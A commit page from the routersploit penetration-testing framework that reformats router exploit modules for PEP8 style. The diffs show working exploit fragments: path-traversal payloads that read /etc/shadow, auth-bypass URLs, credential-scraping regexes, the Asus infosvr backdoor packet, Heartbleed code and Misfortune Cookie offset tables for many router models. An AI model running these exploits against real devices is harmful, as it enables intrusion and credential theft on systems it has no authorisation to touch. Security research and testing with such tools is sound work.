Skip to content

R
routersploit
Commit 350f1212 by fwkz
Options

Fixing PEP8 violations.

parent 73e8b5cd
Showing with 226 additions and 201 deletions
routersploit/modules/exploits/2wire/4011g_5012nv_path_traversal.py
......@@ -42,7 +42,7 @@ class Exploit(exploits.Exploit):
print_status("Sending read {} file request".format(self.filename))
url = "{}:{}/goform/enhAuthHandler".format(self.target, self.port)
headers = {u"Content-Type": u"application/x-www-form-urlencoded"}
data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename),
......
routersploit/modules/exploits/2wire/gateway_auth_bypass.py
......@@ -49,7 +49,7 @@ class Exploit(exploits.Exploit):
# checking if the target is valid
url = "{}:{}/".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......@@ -59,7 +59,7 @@ class Exploit(exploits.Exploit):
# checking if authentication can be bypassed
url = "{}:{}/xslt".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......
routersploit/modules/exploits/3com/3cradsl72_info_disclosure.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com 3CRADSL72 Info Disclosure',
'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability that allows to fetch credentials for SQL sa account',
'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability '
'that allows to fetch credentials for SQL sa account',
'authors': [
'Karb0nOxyde <karb0noxyde[at]gmail.com>', # vulnerability discovery
'Ivan Casado Ruiz <casadoi[at]yahoo.co.uk>', # vulnerability discovery
......@@ -28,7 +29,7 @@ class Exploit(exploits.Exploit):
'http://www.securityfocus.com/bid/11408/exploit',
],
'devices': [
'3Com 3CRADSL72',
'3Com 3CRADSL72',
],
}
......
routersploit/modules/exploits/3com/ap8760_password_disclosure.py
......@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
print_status("Extracting credentials")
username = re.findall('<input type="text" name="szUsername" size=16 value="(.+?)">', response.text)
password = re.findall('<input type="password" name="szPassword" size=16 maxlength="16" value="(.+?)">', response.text)
if len(username) and len(password):
print_success("Exploit success")
creds.append((username[0], password[0]))
......
routersploit/modules/exploits/3com/imc_info_disclosure.py
......@@ -26,7 +26,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/12680/',
],
'devices': [
'3Com Intelligent Management Center',
'3Com Intelligent Management Center',
],
}
......
routersploit/modules/exploits/3com/imc_path_traversal.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com IMC Path Traversal',
'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. If the target is vulnerable it is possible to read file from the filesystem.',
'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. '
'If the target is vulnerable it is possible to read file from the filesystem.',
'authors': [
'Richard Brain', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -26,7 +27,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/12679/',
],
'devices': [
'3Com Intelligent Management Center',
'3Com Intelligent Management Center',
],
}
......@@ -34,7 +35,6 @@ class Exploit(exploits.Exploit):
port = exploits.Option(8080, 'Target port') # default port
filename = exploits.Option('\\windows\\win.ini', 'File to read from the filesystem')
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
......
routersploit/modules/exploits/3com/officeconnect_info_disclosure.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com OfficeConnect Info Disclosure',
'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. If the target is vulnerable it is possible to read sensitive information.',
'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. '
'If the target is vulnerable it is possible to read sensitive information.',
'authors': [
'Luca Carettoni <luca.carettoni[at]ikkisoft.com>', # vulnerablity discovery
'iDefense', # vulnerability discovery
......@@ -28,7 +29,7 @@ class Exploit(exploits.Exploit):
'http://seclists.org/vulnwatch/2005/q1/42',
],
'devices': [
'3Com OfficeConnect',
'3Com OfficeConnect',
],
}
......@@ -59,13 +60,13 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
for resource in self.resources:
for resource in self.resources:
url = "{}:{}{}".format(self.target, self.port, resource)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if "pppoe_username" in response.text and "pppoe_password" in response.text:
self.valid = resource
return True # target is vulnerable
......
routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
......@@ -23,10 +23,10 @@ class Exploit(exploits.Exploit):
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt',
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt',
],
'devices': [
'Asmax AR 1004g',
'Asmax AR 1004g',
],
}
......
routersploit/modules/exploits/asus/infosvr_backdoor_rce.py
......@@ -70,7 +70,7 @@ class Exploit(exploits.Exploit):
sock.bind(('0.0.0.0', 9999))
sock.settimeout(2)
packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
try:
sock.sendto(packet, (self.target, 9999))
......@@ -86,7 +86,7 @@ class Exploit(exploits.Exploit):
if len(data) == 512 and data[1] == "\x16":
break
length = struct.unpack('<H', data[14:16])[0]
output = data[16:16+length]
output = data[16:16 + length]
sock.close()
return output
......
routersploit/modules/exploits/belkin/g_plus_info_disclosure.py
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Belkin G Info Disclosure',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability which allows fetching sensitive information such as credentials.',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure '
'vulnerability which allows fetching sensitive information such as credentials.',
'authors': [
'DarkFig', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -42,15 +43,17 @@ class Exploit(exploits.Exploit):
if response is None:
return
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
var = [
'pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd'
]
data = []
for v in var:
......@@ -76,15 +79,17 @@ class Exploit(exploits.Exploit):
if response is None:
return False # target is not vulnerable
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
var = [
'pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd'
]
if any(map(lambda x: x in response.text, var)):
return True # target vulnerable
......
routersploit/modules/exploits/cisco/dpc2420_info_disclosure.py
......@@ -58,4 +58,3 @@ class Exploit(exploits.Exploit):
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/cisco/ucm_info_disclosure.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco UCM Info Disclosure',
'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. If the target is vulnerable it is possible to read sensitive information through TFTP service.',
'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. '
'If the target is vulnerable it is possible to read sensitive information through TFTP service.',
'authors': [
'Daniel Svartman <danielsvartman[at]gmail.com', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -72,4 +73,3 @@ class Exploit(exploits.Exploit):
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/cisco/ucs_manager_rce.py
......@@ -19,7 +19,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco UCS Manager RCE',
'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which allows executing commands on operating system level.',
'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which '
'allows executing commands on operating system level.',
'authors': [
'thatchriseckert', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -84,4 +85,3 @@ class Exploit(exploits.Exploit):
return True
return False
routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
......@@ -10,7 +10,7 @@ from routersploit import (
http_request,
mute,
validators,
)
)
class Exploit(exploits.Exploit):
......@@ -23,13 +23,13 @@ class Exploit(exploits.Exploit):
'description': 'WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability',
'authors': [
'TUNISIAN CYBER', # routersploit module
],
],
'references': [
'https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html'
],
],
'devices': [
'Comtrend CT 5361T (more likely CT 536X)',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
......
routersploit/modules/exploits/dlink/dir_300_320_600_615_info_disclosure.py
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600,'
'DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'authors': [
'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -63,7 +64,7 @@ class Exploit(exploits.Exploit):
return False # target is not vulnerable
creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text)
if len(creds):
return True # target is vulnerable
......
routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py
......@@ -15,7 +15,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615'
'revD devices. It is possible to access administration panel without providing password.',
'authors': [
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
......@@ -58,7 +59,7 @@ class Exploit(exploits.Exploit):
# checking if authentication can be baypassed
url = "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......
routersploit/modules/exploits/dlink/dir_645_815_rce.py
......@@ -19,7 +19,7 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DIR-645 & DIR-815 RCE',
'description': 'Module exploits D-Link DIR-645 and DIR-815 Remote Code Execution vulnerability which allows executing command on the device.',
'authors': [
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
......
routersploit/modules/exploits/dlink/dsl_2730b_2780b_526b_dns_change.py
......@@ -38,7 +38,6 @@ class Exploit(exploits.Exploit):
dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server')
dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server')
def run(self):
url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.target,
self.port,
......
routersploit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py
......@@ -66,7 +66,18 @@ class Exploit(exploits.Exploit):
def check(self):
# address and parameters
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
data = {
"getpage": "html/index.html",
"*errorpage*": "../../../../../../../../../../../etc/shadow",
"var%3Amenu": "setup",
"var%3Apage": "connected",
"var%": "",
"objaction": "auth",
"%3Ausername": "blah",
"%3Apassword": "blah",
"%3Aaction": "login",
"%3Asessionid": "abcdefgh"
}
# connection
response = http_request(method="POST", url=url, data=data)
......@@ -77,4 +88,3 @@ class Exploit(exploits.Exploit):
return True # target vulnerable
return False # target not vulnerable
routersploit/modules/exploits/huawei/e5331_mifi_info_disclosure.py
......@@ -49,7 +49,7 @@ class Exploit(exploits.Exploit):
regexp = "<{}>(.+?)</{}>".format(option, option)
value = re.findall(regexp, response.text)
if value:
res.append((option, value[0]))
res.append((option, value[0]))
if len(res):
print_success("Found sensitive information!")
......
routersploit/modules/exploits/huawei/hg520_info_dislosure.py
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Huawei HG520 Information Disclosure',
'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity. If the target is vulnerable it is possible to retrieve sensitive information.',
'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity.'
'If the target is vulnerable it is possible to retrieve sensitive information.',
'authors': [
'hkm', # vulnerablity discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -70,7 +71,7 @@ class Exploit(exploits.Exploit):
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
print_status("Sending exploit payload")
sock.sendto(self.payload, (self.target, 43690))
......@@ -95,7 +96,7 @@ class Exploit(exploits.Exploit):
response = sock.recv(1024)
except:
return False # target is not vulnerable
if len(response):
return True # target is vulnerable
......
routersploit/modules/exploits/huawei/hg866_password_change.py
......@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
if response.status_code == 200:
print_success("Administrator's password has been changed to {}".format(self.password))
else:
print_error("Exploit failed - could not change password")
print_error("Exploit failed - could not change password")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/ipfire/ipfire_shellshock.py
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'IPFire Shellshock',
'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82. If the target is vulnerable it is possible to execute commands on operating system level.',
'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82.'
'If the target is vulnerable it is possible to execute commands on operating system level.',
'authors': [
'Claudio Viviani', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
......@@ -27,7 +28,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/34839',
],
'devices': [
'IPFire <= 2.15 Core Update 82',
'IPFire <= 2.15 Core Update 82',
],
}
......@@ -72,7 +73,7 @@ class Exploit(exploits.Exploit):
return ""
if response.status_code == 200:
start = response.text.find(marker) + len(marker) + 1 # marker and whitespace
start = response.text.find(marker) + len(marker) + 1 # marker and whitespace
end = response.text.find(marker, start) - 48
return response.text[start:end]
......@@ -86,7 +87,7 @@ class Exploit(exploits.Exploit):
marker = random_text(32)
cmd = "echo {}".format(marker)
payload = self.payload.replace("{{cmd}}", cmd)
headers = {
'VULN': payload,
}
......
routersploit/modules/exploits/linksys/wap54gv3_rce.py
......@@ -19,7 +19,9 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Linksys WAP54Gv3',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices. Debug interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices.'
'Debug interface allows executing root privileged shell commands is available'
'on dedicated web pages on the device.',
'authors': [
'Phil Purviance', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -64,7 +66,7 @@ class Exploit(exploits.Exploit):
if len(res):
return res[0]
return ""
@mute
......
routersploit/modules/exploits/multi/heartbleed.py
......@@ -53,10 +53,10 @@ class Exploit(exploits.Exploit):
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
00 0f 00 01 01
'''
hb = '''
hb = '''
18 03 02 00 03
01 40 00
'''
......@@ -66,9 +66,9 @@ class Exploit(exploits.Exploit):
def hexdump(self, s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
lin = [c for c in s[b: b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
......@@ -77,7 +77,7 @@ class Exploit(exploits.Exploit):
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
......@@ -92,7 +92,7 @@ class Exploit(exploits.Exploit):
rdata += data
remain -= len(data)
return rdata
return rdata
def recvmsg(self, s):
hdr = self.recvall(s, 5)
......@@ -139,11 +139,11 @@ class Exploit(exploits.Exploit):
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
if typ is None:
print_error("Server closed connection without sending Server Hello.")
print_error("Exploit failed")
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
......@@ -163,7 +163,7 @@ class Exploit(exploits.Exploit):
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
if typ is None:
return False # target is not vulnerable
if typ == 22 and ord(pay[0]) == 0x0E:
......
routersploit/modules/exploits/multi/misfortune_cookie.py
......@@ -30,92 +30,92 @@ class Exploit(exploits.Exploit):
],
'devices': [
# brand # model # firmware
{'name': "Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1", 'number': 107367693, 'offset': 13}, # 0x803D5A79 # tested
{'name': "Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13}, # 0x8032204d # ----------
{'name': "Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13}, # 0x8032204d # ----------
{'name': "Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6", 'number': 107369545, 'offset': 9}, # 0x803ec2ad # ----------
{'name': "Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0", 'number': 107371218, 'offset': 21}, # 0x803c53e5 # ----------
{'name': "Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0", 'number': 107366366, 'offset': 25}, # 0x8038a6e1 # ----------
{'name': "Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0", 'number': 107371453, 'offset': 9}, # 0x803b3a51 # ----------
{'name': "Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52", 'number': 107367690, 'offset': 21}, # 0x803D8A51 # tested
{'name': "Billion BiPAC 5200SRD 2.10.5.0 (UE0.C2C) 3.6.0.0", 'number': 107368270, 'offset': 1}, # 0x8034b109 # ----------
{'name': "Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0", 'number': 107371378, 'offset': 37}, # 0x8040587d # ----------
{'name': "Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22", 'number': 107371218, 'offset': 13}, # 0x803c49d5 # ----------
{'name': "D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL", 'number': 107368902, 'offset': 25}, # 0x803fea01 # tested
{'name': "D-Link DSL-2600U Z1_DSL-2600U", 'number': 107366496, 'offset': 13}, # 0x8040637d # ----------
{'name': "D-Link DSL-2600U Z2_V1.08_ras", 'number': 107360133, 'offset': 20}, # 0x803389B0 # ----------
{'name': "TP-Link TD-8616 V2_080513", 'number': 107371483, 'offset': 21}, # 0x80397055 # ----------
{'name': "TP-Link TD-8816 V4_100528_Russia", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V4_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100528_Russia", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # tested
{'name': "TP-Link TD-8816 V5_100903", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V6_100907", 'number': 107371426, 'offset': 17}, # 0x803c6e09 # ----------
{'name': "TP-Link TD-8816 V7_111103", 'number': 107371161, 'offset': 1}, # 0x803e1bd5 # ----------
{'name': "TP-Link TD-8816 V7_130204", 'number': 107370211, 'offset': 5}, # 0x80400c85 # ----------
{'name': "TP-Link TD-8817 V5_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100702_TR", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100903", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V6_100907", 'number': 107369788, 'offset': 1}, # 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V6_101221", 'number': 107369788, 'offset': 1}, # 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V7_110826", 'number': 107369522, 'offset': 25}, # 0x803d1bd5 # ----------
{'name': "TP-Link TD-8817 V7_130217", 'number': 107369316, 'offset': 21}, # 0x80407625 # ----------
{'name': "TP-Link TD-8817 V7_120509", 'number': 107369321, 'offset': 9}, # 0x803fbcc5 # tested
{'name': "TP-Link TD-8817 V8_140311", 'number': 107351277, 'offset': 20}, # 0x8024E148 # tested
{'name': "TP-Link TD-8820 V3_091223", 'number': 107369768, 'offset': 17}, # 0x80397E69 # tested
{'name': "TP-Link TD-8840T V1_080520", 'number': 107369845, 'offset': 5}, # 0x80387055 # ----------
{'name': "TP-Link TD-8840T V2_100525", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # tested
{'name': "TP-Link TD-8840T V2_100702_TR", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8840T V2_090609", 'number': 107369570, 'offset': 1}, # 0x803c65d5 # ----------
{'name': "TP-Link TD-8840T V3_101208", 'number': 107369766, 'offset': 17}, #0x803c3e89 # tested
{'name': "TP-Link TD-8840T V3_110221", 'number': 107369764, 'offset': 5}, # 0x803d1a09 # ----------
{'name': "TP-Link TD-8840T V3_120531", 'number': 107369688, 'offset': 17}, # 0x803fed35 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367772, 'offset': 37}, # 0x803bf701 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367808, 'offset': 21}, # 0x803e5b6d # ----------
{'name': "TP-Link TD-W8101G V2_100819", 'number': 107367751, 'offset': 21}, # 0x803dc701 # ----------
{'name': "TP-Link TD-W8101G V2_101015_TR", 'number': 107367749, 'offset': 13}, # 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V2_101101", 'number': 107367749, 'offset': 13}, # 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V3_110119", 'number': 107367765, 'offset': 25}, # 0x804bb941 # ----------
{'name': "TP-Link TD-W8101G V3_120213", 'number': 107367052, 'offset': 25}, # 0x804e1ff9 # ----------
{'name': "TP-Link TD-W8101G V3_120604", 'number': 107365835, 'offset': 1}, # 0x804f16a9 # ----------
{'name': "TP-Link TD-W8151N V3_120530", 'number': 107353867, 'offset': 24}, # 0x8034F3A4 # tested
{'name': "TP-Link TD-W8901G V1_080522", 'number': 107367787, 'offset': 21}, # 0x803AB30D # tested
{'name': "TP-Link TD-W8901G V1,2_080522", 'number': 107368013, 'offset': 5}, # 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V2_090113_Turkish", 'number': 107368013, 'offset': 5}, # 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V3_140512", 'number': 107367854, 'offset': 9}, # 0x803cf335 # tested
{'name': "TP-Link TD-W8901G V3_100603", 'number': 107367751, 'offset': 21}, # 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100702_TR", 'number': 107367751, 'offset': 21}, # 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100901", 'number': 107367749, 'offset': 13}, # 0x803E1829 # tested
{'name': "TP-Link TD-W8901G V6_110119", 'number': 107367765, 'offset': 25}, # 0x804BB941 # tested
{'name': "TP-Link TD-W8901G V6_110915", 'number': 107367682, 'offset': 21}, # 0x804D7CB9 # tested
{'name': "TP-Link TD-W8901G V6_120418", 'number': 107365835, 'offset': 1}, # 0x804F16A9 # ----------
{'name': "TP-Link TD-W8901G V6_120213", 'number': 107367052, 'offset': 25}, # 0x804E1FF9 # ----------
{'name': "TP-Link TD-W8901GB V3_100727", 'number': 107367756, 'offset': 13}, # 0x803dfbe9 # ----------
{'name': "TP-Link TD-W8901GB V3_100820", 'number': 107369393, 'offset': 21}, # 0x803f1719 # ----------
{'name': "TP-Link TD-W8901N V1_111211", 'number': 107353880, 'offset': 0}, # 0x8034FF94 # tested
{'name': "TP-Link TD-W8951ND V1_101124,100723,100728", 'number': 107369839, 'offset': 25}, # 0x803d2d61 # tested
{'name': "TP-Link TD-W8951ND V1_110907", 'number': 107369876, 'offset': 13}, # 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V1_111125", 'number': 107369876, 'offset': 13}, # 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V3.0_110729_FI", 'number': 107366743, 'offset': 21}, # 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V3_110721", 'number': 107366743, 'offset': 21}, # 0x804ee049 # ----------
{'name': "TP-Link TD-W8951ND V3_20110729_FI", 'number': 107366743, 'offset': 21}, # 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V4_120511", 'number': 107364759, 'offset': 25}, # 0x80523979 # tested
{'name': "TP-Link TD-W8951ND V4_120607", 'number': 107364759, 'offset': 13}, # 0x80524A91 # tested
{'name': "TP-Link TD-W8951ND V4_120912_FL", 'number': 107364760, 'offset': 21}, # 0x80523859 # tested
{'name': "TP-Link TD-W8961NB V1_110107", 'number': 107369844, 'offset': 17}, # 0x803de3f1 # tested
{'name': "TP-Link TD-W8961NB V1_110519", 'number': 107369844, 'offset': 17}, # 0x803de3f1 # ----------
{'name': "TP-Link TD-W8961NB V2_120319", 'number': 107367629, 'offset': 21}, # 0x80531859 # ----------
{'name': "TP-Link TD-W8961NB V2_120823", 'number': 107366421, 'offset': 13}, # 0x80542e59 # ----------
{'name': "TP-Link TD-W8961ND V1_100722,101122", 'number': 107369839, 'offset': 25}, # 0x803D2D61 # tested
{'name': "TP-Link TD-W8961ND V1_101022_TR", 'number': 107369839, 'offset': 25}, # 0x803D2D61 # ----------
{'name': "TP-Link TD-W8961ND V1_111125", 'number': 107369876, 'offset': 13}, # 0x803D6EF9 # ----------
{'name': "TP-Link TD-W8961ND V2_120427", 'number': 107364732, 'offset': 25}, # 0x8052e0e9 # ----------
{'name': "TP-Link TD-W8961ND V2_120710_UK", 'number': 107364771, 'offset': 37}, # 0x80523AA9 # ----------
{'name': "TP-Link TD-W8961ND V2_120723_FI", 'number': 107364762, 'offset': 29}, # 0x8052B6B1 # ----------
{'name': "TP-Link TD-W8961ND V3_120524,120808", 'number': 107353880, 'offset': 0}, # 0x803605B4 # ----------
{'name': "TP-Link TD-W8961ND V3_120830", 'number': 107353414, 'offset': 36}, # 0x803605B4 # ----------
{'name': "ZyXEL P-660R-T3 3.40(BOQ.0)C0", 'number': 107369567, 'offset': 21}, # 0x803db071 # tested
{'name': "ZyXEL P-660RU-T3 3.40(BJR.0)C0", 'number': 107369567, 'offset': 21}, # 0x803db071
{'name': "Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1", 'number': 107367693, 'offset': 13}, # 0x803D5A79 # tested
{'name': "Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13}, # 0x8032204d # ----------
{'name': "Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13}, # 0x8032204d # ----------
{'name': "Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6", 'number': 107369545, 'offset': 9}, # 0x803ec2ad # ----------
{'name': "Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0", 'number': 107371218, 'offset': 21}, # 0x803c53e5 # ----------
{'name': "Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0", 'number': 107366366, 'offset': 25}, # 0x8038a6e1 # ----------
{'name': "Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0", 'number': 107371453, 'offset': 9}, # 0x803b3a51 # ----------
{'name': "Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52", 'number': 107367690, 'offset': 21}, # 0x803D8A51 # tested
{'name': "Billion BiPAC 5200SRD 2.10.5.0 (UE0.C2C) 3.6.0.0", 'number': 107368270, 'offset': 1}, # 0x8034b109 # ----------
